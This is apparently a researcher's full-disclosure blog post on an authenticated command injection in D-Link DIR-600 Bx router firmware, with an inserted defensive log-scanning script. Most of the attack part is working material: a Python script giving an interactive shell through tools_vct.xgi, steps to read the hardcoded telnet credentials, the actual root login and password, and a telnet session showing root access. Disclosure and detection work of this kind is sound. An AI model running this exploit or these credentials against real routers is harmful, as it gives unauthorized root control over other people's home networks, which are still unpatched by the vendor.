In February I contacted D-Link Chile, then D-Link Latin America, but I never received an official answer to my report. After eight months, I am publishing the details of this vulnerability (I tried responsible disclosure, but D-Link didn't take my reports into account). It's a simple command injection vulnerability that requires administrator credentials. For more details you can check my last post about this issue. The hardware version is Bx and the affected firmware versions are:
- Version 2.0 (default): it's vulnerable to the HNAP flaw too (tested by me), which is how I managed to get admin credentials
- Version 2.05 (current)
The vulnerable pages are:
The exploit I use, after authenticating in the web browser, is the following:
#!/usr/bin/env python3
# coding=utf8
# csalazar at spect dot cl
import http.cookiejar
import urllib.request, urllib.error
import sys

if len(sys.argv) != 2:
    print('Usage: python3 %s router_ip' % sys.argv[0])
    sys.exit(0)

# The command goes between the "||" separators of the rgdb key that tools_vct.xgi sets
url = 'http://' + sys.argv[1] + '/tools_vct.xgi?set/runtime/switch/||%s||=1'
# Keep any cookie the router sets across the requests of this session
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

while True:
    command = input('$ ')
    try:
        r = opener.open(url % (command))
    except urllib.error.HTTPError as e:
        # The router answers with an HTTP error whose body carries the command output
        output = e.info()._payload
        print(output[:-136])
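A defender's counterpart to the script above, added here as an example and not part of the original post: it scans access-log lines for requests to tools_vct.xgi whose query string carries shell metacharacters, which is the shape of this injection. It assumes requests to the router are recorded by some intermediate device (proxy, IDS sensor) in the common log format; the log lines and the benign parameter name are constructed for the example.

```python
#!/usr/bin/env python3
# Added example (not from the original post): flag HTTP requests to the
# DIR-600's tools_vct.xgi endpoint whose query string carries shell
# metacharacters, i.e. the command injection pattern described above.
import re
from urllib.parse import unquote, urlsplit

# Characters that have no business inside a /runtime/switch/... rgdb key.
SHELL_META = re.compile(r'[|;&`$(){}<>\n]')

def is_suspicious_request(request_line):
    """Return the decoded query if the request abuses tools_vct.xgi, else None."""
    try:
        method, target, _version = request_line.split(' ', 2)
    except ValueError:
        return None
    parts = urlsplit(target)
    if not parts.path.endswith('/tools_vct.xgi'):
        return None
    # The router treats the whole query string as an rgdb assignment; the
    # injected command sits between "||" separators, so decode and inspect it.
    query = unquote(parts.query)
    if SHELL_META.search(query):
        return query
    return None

def scan_log(lines):
    """Return (line_number, decoded_query) for each suspicious request in
    access-log lines written in the common log format."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = re.search(r'"([A-Z]+ [^"]+ HTTP/1\.[01])"', line)
        if m is None:
            continue
        query = is_suspicious_request(m.group(1))
        if query is not None:
            hits.append((number, query))
    return hits

# Constructed sample log (hypothetical): one benign VCT request, one injection attempt.
SAMPLE_LOG = [
    '192.168.0.100 - - [10/Oct/2011:12:00:01 +0000] "GET /tools_vct.xgi?set/runtime/switch/vct_port=1 HTTP/1.1" 200 512',
    '192.168.0.100 - - [10/Oct/2011:12:00:05 +0000] "GET /tools_vct.xgi?set/runtime/switch/||id||=1 HTTP/1.1" 500 0',
    '192.168.0.100 - - [10/Oct/2011:12:00:09 +0000] "GET /index.htm HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for number, query in scan_log(SAMPLE_LOG):
        print('line %d: %s' % (number, query))
```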
A short video with the exploit in action is here:
Getting root access
Telnet is disabled by default, but it can be enabled. The steps are: first, find the user name and password used by the telnet service (both are hardcoded in the script that starts it, the password being the contents of /etc/config/image_sign), and then start the telnet daemon.
$ cat /etc/scripts/misc/telnetd.sh
#!/bin/sh
image_sign=`cat /etc/config/image_sign`
TELNETD=`rgdb -g /sys/telnetd`
if [ "$TELNETD" = "true" ]; then
    echo "Start telnetd ..." > /dev/console
    if [ -f "/usr/sbin/login" ]; then
        lf=`rgdb -i -g /runtime/layout/lanif`
        telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &
    else
        telnetd &
    fi
fi
$ cat /etc/config/image_sign
wrgn23_dlwbr_dir600b
$ sh /etc/scripts/misc/telnetd.sh
After that, you can log in over Telnet with root privileges!
csalazar:~/spect/security/research/dlink$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
login: Alphanetworks
Password: wrgn23_dlwbr_dir600b
BusyBox v1.00 (2010.11.23-03:23+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
Fixing the problem
No solution is provided by D-Link. The only solution is to install DD-WRT on this router.